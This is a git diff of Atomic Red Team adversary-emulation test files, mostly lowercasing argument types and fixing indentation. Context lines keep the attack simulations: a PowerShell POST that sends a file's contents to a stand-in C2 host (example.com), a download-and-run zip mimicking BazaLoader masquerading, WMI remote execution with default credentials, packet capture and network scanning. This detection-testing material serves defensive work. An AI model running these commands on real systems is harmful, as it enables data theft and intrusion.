b/atomics/T1021.006/T1021.006.yaml index 130f6f96..0bc77ab6 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml @@ -28,7 +28,7 @@ atomic_tests: Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami} cleanup_command: Disable-PSRemoting -Force name: powershell - + - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled @@ -37,15 +37,15 @@ atomic_tests: input_arguments: user_name: description: Username - type: String + type: string default: Domain\Administrator destination_address: description: Remote Host IP or Hostname - type: String + type: string default: Target password: description: Password - type: String + type: string default: P@ssw0rd1 dependency_executor_name: powershell dependencies: diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml index 73fc36d9..a84f631e 100644 --- a/atomics/T1027.001/T1027.001.yaml +++ b/atomics/T1027.001/T1027.001.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: file_to_pad: description: Path of binary to be padded - type: Path + type: path default: /tmp/evil-binary dependency_executor_name: bash dependencies: @@ -29,4 +29,3 @@ atomic_tests: cleanup_command: | rm #{file_to_pad} name: sh - diff --git a/atomics/T1027.002/T1027.002.yaml b/atomics/T1027.002/T1027.002.yaml index f394bf9d..a891d849 100644 --- a/atomics/T1027.002/T1027.002.yaml +++ b/atomics/T1027.002/T1027.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx executor: command: | @@ -31,7 +31,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx executor: command: | @@ -69,7 +69,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed executor: command: | @@ -77,4 +77,3 @@ atomic_tests: cleanup_command: | rm /tmp/packed_bin name: sh - diff --git a/atomics/T1027.004/T1027.004.yaml b/atomics/T1027.004/T1027.004.yaml index 7a7ba521..45edd715 100644 --- a/atomics/T1027.004/T1027.004.yaml +++ b/atomics/T1027.004/T1027.004.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: output_file: description: Output compiled binary - type: Path + type: path default: C:\Windows\Temp\T1027.004.exe input_file: description: C# code that launches calc.exe from a hidden cmd.exe Window - type: Path + type: path default: PathToAtomicsFolder\T1027.004\src\calc.cs dependency_executor_name: powershell dependencies: @@ -44,7 +44,7 @@ atomic_tests: input_arguments: input_file: description: exe program containing dynamically compiled C# code - type: Path + type: path default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe dependency_executor_name: powershell dependencies: @@ -69,7 +69,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c dependency_executor_name: sh dependencies: @@ -94,7 +94,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc dependency_executor_name: sh dependencies: @@ -119,7 +119,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go dependency_executor_name: sh dependencies: @@ -133,4 +133,3 @@ atomic_tests: command: | go run #{input_file} name: bash - diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index f452da1b..0ca57c64 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: shell_command: description: command to encode - type: String + type: string default: "echo Hello from the Atomic Red Team && uname -v" dependency_executor_name: sh dependencies: @@ -44,7 +44,7 @@ atomic_tests: input_arguments: powershell_command: description: PowerShell command to encode - type: String + type: string default: Write-Host "Hey, Atomic!" executor: command: | @@ -65,15 +65,15 @@ atomic_tests: input_arguments: registry_key_storage: description: Windows Registry Key to store code - type: String + type: string default: HKCU:Software\Microsoft\Windows\CurrentVersion powershell_command: description: PowerShell command to encode - type: String + type: string default: Write-Host "Hey, Atomic!" registry_entry_storage: description: Windows Registry entry to store code under key - type: String + type: string default: Debug executor: command: | @@ -96,7 +96,7 @@ atomic_tests: input_arguments: url_path: description: url to download Exe - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip dependency_executor_name: powershell dependencies: @@ -126,19 +126,19 @@ atomic_tests: input_arguments: input_file: description: Path of the XLSM file - type: Path + type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm sender: description: sender email - type: String + type: string default: test@corp.com receiver: description: receiver email - type: String + type: string default: test@corp.com smtp_server: description: SMTP Server IP Address - type: String + type: string default: 127.0.0.1 executor: command: | @@ -154,11 +154,11 @@ atomic_tests: input_arguments: input_file: description: Path of the XLSM file - type: Path + type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm ip_address: description: Destination IP address - type: String + type: string default: 127.0.0.1 executor: command: | @@ -185,11 +185,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path/filename to save the dowloaded file to - type: Path + type: path default: Atomic-license.txt executor: steps: | diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 8397774c..1497fb07 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: file_name: description: File name - type: Path + type: path default: T1030_urandom folder_path: description: Path where the test creates artifacts - type: Path + type: path default: /tmp/T1030 dependency_executor_name: sh dependencies: @@ -31,4 +31,3 @@ atomic_tests: cleanup_command: | if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; name: sh - diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index b7889c4b..7cff4e22 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: computer_name: description: Name of remote computer - type: String + type: string default: localhost executor: command: | diff --git a/atomics/T1036.003/T1036.003.yaml b/atomics/T1036.003/T1036.003.yaml index e417bce5..3f2e104c 100644 --- a/atomics/T1036.003/T1036.003.yaml +++ b/atomics/T1036.003/T1036.003.yaml @@ -87,11 +87,11 @@ atomic_tests: input_arguments: outputfile: description: path of file to execute - type: Path + type: path default: ($env:TEMP + "\svchost.exe") inputfile: description: path of file to copy - type: Path + type: path default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe dependency_executor_name: powershell dependencies: @@ -119,11 +119,11 @@ atomic_tests: input_arguments: outputfile: description: path of file to execute - type: Path + type: path default: ($env:TEMP + "\svchost.exe") inputfile: description: path of file to copy - type: Path + type: path default: $env:ComSpec executor: command: | @@ -162,32 +162,32 @@ atomic_tests: input_arguments: exe_path: description: path to exe to use when creating masquerading files - type: Path + type: path default: C:\Windows\System32\calc.exe vbs_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs ps1_path: description: path of powershell script to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1 dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{vbs_path}) - prereq_command: | - if (Test-Path #{vbs_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}" - - description: | - File to copy must exist on disk at specified location (#{ps1_path}) - prereq_command: | - if (Test-Path #{ps1_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}" + - description: | + File to copy must exist on disk at specified location (#{vbs_path}) + prereq_command: | + if (Test-Path #{vbs_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}" + - description: | + File to copy must exist on disk at specified location (#{ps1_path}) + prereq_command: | + if (Test-Path #{ps1_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}" executor: command: | copy #{exe_path} %temp%\T1036.003_masquerading.docx.exe /Y @@ -219,4 +219,3 @@ atomic_tests: del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1 del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1 name: command_prompt - diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 99b00201..e8b05be4 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -6,12 +6,12 @@ atomic_tests: description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) supported_platforms: - - macos - - linux + - macos + - linux input_arguments: test_message: description: Test message to echo out to the screen - type: String + type: string default: Hello from the Atomic Red Team test T1036.005#1 executor: name: sh @@ -32,7 +32,7 @@ atomic_tests: input_arguments: executable_filepath: description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. - type: String + type: string default: $Env:windir\Temp\svchost.exe executor: command: | @@ -43,7 +43,7 @@ atomic_tests: } } '@ -OutputAssembly "#{executable_filepath}" - + Start-Process -FilePath "#{executable_filepath}" cleanup_command: | Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index 31ef97aa..68a2f39f 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml @@ -1,41 +1,41 @@ -attack_technique: T1036 -display_name: "Masquerading" -atomic_tests: -- name: System File Copied to Unusual Location - auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd - description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. - supported_platforms: - - windows - executor: - command: |- - copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" - start-process "$env:allusersprofile\cmd.exe" - sleep -s 5 - stop-process -name "cmd" | out-null - cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue - name: powershell -- name: Malware Masquerading and Execution from Zip File - auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc - description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960) - supported_platforms: - - windows - input_arguments: - url: - description: Location of zip file - type: Url - default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip - dependencies: - - description: Zip file must be present. - prereq_command: | - if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url} - executor: - command: |- - Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force - cd $env:userprofile\Downloads\T1036 - cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null - cleanup_command: |- - taskkill /IM Calculator.exe /f >$null 2>$null - Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore - name: powershell +attack_technique: T1036 +display_name: "Masquerading" +atomic_tests: +- name: System File Copied to Unusual Location + auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd + description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. + supported_platforms: + - windows + executor: + command: |- + copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" + start-process "$env:allusersprofile\cmd.exe" + sleep -s 5 + stop-process -name "cmd" | out-null + cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue + name: powershell +- name: Malware Masquerading and Execution from Zip File + auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc + description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960) + supported_platforms: + - windows + input_arguments: + url: + description: Location of zip file + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip + dependencies: + - description: Zip file must be present. + prereq_command: | + if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url} + executor: + command: |- + Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force + cd $env:userprofile\Downloads\T1036 + cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null + cleanup_command: |- + taskkill /IM Calculator.exe /f >$null 2>$null + Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore + name: powershell diff --git a/atomics/T1037.001/T1037.001.yaml b/atomics/T1037.001/T1037.001.yaml index 357280a8..11fa1994 100644 --- a/atomics/T1037.001/T1037.001.yaml +++ b/atomics/T1037.001/T1037.001.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: script_path: description: Path to .bat file - type: String + type: string default: '%temp%\art.bat' script_command: description: Command To Execute - type: String + type: string default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt executor: command: | @@ -25,4 +25,4 @@ atomic_tests: REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1039/T1039.yaml b/atomics/T1039/T1039.yaml index f712e13e..637e633b 100644 --- a/atomics/T1039/T1039.yaml +++ b/atomics/T1039/T1039.yaml @@ -1,5 +1,5 @@ attack_technique: T1039 -display_name: Data from Network Shared Drive +display_name: Data from Network Shared Drive atomic_tests: - name: Copy a sensitive File over Administive share with copy auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660 @@ -10,31 +10,31 @@ atomic_tests: - windows input_arguments: remote: - description: Remote server name + description: Remote server name type: string default: '127.0.0.1' share_file: description: Remote Path to the file - type: Path + type: path default: Windows\temp\Easter_Bunny.password local_file: description: Local name type: string - default: 'Easter_egg.password' + default: 'Easter_egg.password' dependency_executor_name: powershell dependencies: - - description: | - Administrative share must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host 'Please Enable "C$" share on #{remote}' - - description: | - "\\#{remote}\C$\#{share_file}" must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} - get_prereq_command: | - Out-File -FilePath "\\#{remote}\C$\#{share_file}" + - description: | + Administrative share must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host 'Please Enable "C$" share on #{remote}' + - description: | + "\\#{remote}\C$\#{share_file}" must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} + get_prereq_command: | + Out-File -FilePath "\\#{remote}\C$\#{share_file}" executor: command: |- copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file} @@ -52,31 +52,31 @@ atomic_tests: - windows input_arguments: remote: - description: Remote server name + description: Remote server name type: string default: '127.0.0.1' share_file: description: Remote Path to the file - type: Path + type: path default: Windows\temp\Easter_Bunny.password local_file: description: Local name type: string - default: 'Easter_egg.password' + default: 'Easter_egg.password' dependency_executor_name: powershell dependencies: - - description: | - Administrative share must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host 'Please Enable "C$" share on #{remote}' - - description: | - "\\#{remote}\C$\#{share_file}" must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} - get_prereq_command: | - Out-File -FilePath "\\#{remote}\C$\#{share_file}" + - description: | + Administrative share must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host 'Please Enable "C$" share on #{remote}' + - description: | + "\\#{remote}\C$\#{share_file}" must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} + get_prereq_command: | + Out-File -FilePath "\\#{remote}\C$\#{share_file}" executor: command: |- copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}" @@ -84,4 +84,4 @@ atomic_tests: Remove-Item -Path "\\#{remote}\C$\#{share_file}" Remove-Item -Path "$Env:TEMP\#{local_file}" name: powershell - elevation_required: true + elevation_required: true diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 7ffaf68b..0b7769eb 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -12,16 +12,16 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: ens33 dependency_executor_name: bash dependencies: - - description: | - Check if at least one of tcpdump or tshark is installed. - prereq_command: | - if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - get_prereq_command: | - (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) + - description: | + Check if at least one of tcpdump or tshark is installed. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) executor: command: | tcpdump -c 5 -nnni #{interface} @@ -39,16 +39,16 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: en0A dependency_executor_name: bash dependencies: - - description: | - Check if at least one of tcpdump or tshark is installed. - prereq_command: | - if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - get_prereq_command: | - (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) + - description: | + Check if at least one of tcpdump or tshark is installed. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) executor: command: | sudo tcpdump -c 5 -nnni #{interface} @@ -67,40 +67,38 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: Ethernet wireshark_url: description: wireshark installer download URL - type: Url + type: url default: https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe tshark_path: - description: path to tshark.exe - type: Path + description: path to tshark.exe + type: path default: c:\program files\wireshark\tshark.exe npcap_url: description: npcap installed download URL - type: Url + type: url default: https://nmap.org/npcap/dist/npcap-1.31.exe npcap_path: description: path to npcap.sys - type: Path + type: path default: C:\Program Files\Npcap\npcap.sys dependency_executor_name: powershell dependencies: - - description: | - tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - prereq_command: - if (test-path "#{tshark_path}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} - Start-Process $env:temp\wireshark_installer.exe /S - - description: | - npcap must be installed. - prereq_command: - if (test-path "#{npcap_path}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} - Start-Process $env:temp\npcap_installer.exe + - description: | + tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". + prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} + Start-Process $env:temp\wireshark_installer.exe /S + - description: | + npcap must be installed. + prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} + Start-Process $env:temp\npcap_installer.exe executor: command: | "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 @@ -138,8 +136,8 @@ atomic_tests: cleanup_command: |- del %TEMP%\t1040.etl name: command_prompt - elevation_required: true - + elevation_required: true + - name: Windows Internal pktmon set filter auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55 description: |- @@ -163,24 +161,24 @@ atomic_tests: input_arguments: ifname: description: Specify interface to perform PCAP on. - type: String + type: string default: en0 csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_macos_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - exit 1 - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + exit 1 + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -i #{ifname} -t 3 @@ -197,24 +195,24 @@ atomic_tests: input_arguments: ifname: description: Specify interface to perform PCAP on. - type: String + type: string default: en0 csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_macos_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - exit 1 - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + exit 1 + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -f -i #{ifname} -t 3 @@ -231,20 +229,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -a -t 3 @@ -261,20 +259,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -4 -p 6 -t 3 @@ -292,20 +290,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -4 -P -p 17 -t 3 @@ -323,20 +321,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -a -f -t 3 diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml index 1b6a2fb3..33c97841 100644 --- a/atomics/T1041/T1041.yaml +++ b/atomics/T1041/T1041.yaml @@ -10,18 +10,18 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: String + type: string default: example.com filepath: description: The file which is being exfiltrated to the C2 Server. - type: Path + type: path default: $env:TEMP\LineNumbers.txt executor: command: | - if(-not (Test-Path #{filepath})){ - 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } - } - [System.Net.ServicePointManager]::Expect100Continue = $false - $filecontent = Get-Content -Path #{filepath} - Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive + if(-not (Test-Path #{filepath})){ + 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } + } + [System.Net.ServicePointManager]::Expect100Continue = $false + $filecontent = Get-Content -Path #{filepath} + Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive name: powershell diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index 625031dc..ad6c95bd 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: host: description: Host to scan. - type: String + type: string default: 192.168.1.1 executor: command: | @@ -31,15 +31,15 @@ atomic_tests: input_arguments: host: description: Host to scan. - type: String + type: string default: 192.168.1.1 port: description: Ports to scan. - type: String + type: string default: "80" network_range: description: Network Range to Scan. - type: String + type: string default: 192.168.1.0/24 dependency_executor_name: sh dependencies: @@ -76,11 +76,11 @@ atomic_tests: input_arguments: nmap_url: description: NMap installer download URL - type: Url + type: url default: https://nmap.org/dist/nmap-7.80-setup.exe host_to_scan: description: The host to scan with NMap - type: String + type: string default: 127.0.0.1 dependency_executor_name: powershell dependencies: @@ -104,20 +104,20 @@ atomic_tests: input_arguments: host_ip: description: Host to scan. - type: String + type: string default: 127.0.0.1 filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1046\src\T1046.py dependency_executor_name: powershell dependencies: - - description: | - Check if python exists on the machine - prereq_command: | - if (python --version) {exit 0} else {exit 1} - get_prereq_command: | - echo "Python 3 must be installed manually" + - description: | + Check if python exists on the machine + prereq_command: | + if (python --version) {exit 0} else {exit 1} + get_prereq_command: | + echo "Python 3 must be installed manually" executor: command: | python #{filename} -i #{host_ip} diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index bc72a382..674f5001 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -47,11 +47,11 @@ atomic_tests: input_arguments: node: description: Ip Address - type: String + type: string default: 127.0.0.1 service_search_string: description: Name Of Service - type: String + type: string default: Spooler executor: command: | @@ -67,7 +67,7 @@ atomic_tests: input_arguments: process_to_execute: description: Name or path of process to execute. - type: String + type: string default: notepad.exe executor: command: | @@ -86,19 +86,19 @@ atomic_tests: input_arguments: node: description: Ip Address - type: String + type: string default: 127.0.0.1 user_name: description: Username - type: String + type: string default: DOMAIN\Administrator password: description: Password - type: String + type: string default: P@ssw0rd1 process_to_execute: description: Name or path of process to execute. - type: String + type: string default: notepad.exe executor: command: | @@ -132,11 +132,11 @@ atomic_tests: input_arguments: new_class: description: Derived class name - type: String + type: string default: Win32_Atomic process_to_execute: description: Name or path of process to execute. - type: String + type: string default: notepad.exe executor: name: powershell @@ -158,15 +158,15 @@ atomic_tests: input_arguments: node: description: Ip Address - type: String + type: string default: 127.0.0.1 dll_to_execute: description: Path to DLL. - type: String + type: string default: $env:TEMP\calc.dll function_to_execute: description: Name of DLL function to call - type: String + type: string default: StartW dependency_executor_name: powershell dependencies: @@ -192,7 +192,7 @@ atomic_tests: default: 127.0.0.1 product: description: Enter the product name being uninstalled. This will default to TightVNC. - type: String + type: string default: Tightvnc dependency_executor_name: powershell dependencies: diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml index aa0a8bc8..719338b8 100644 --- 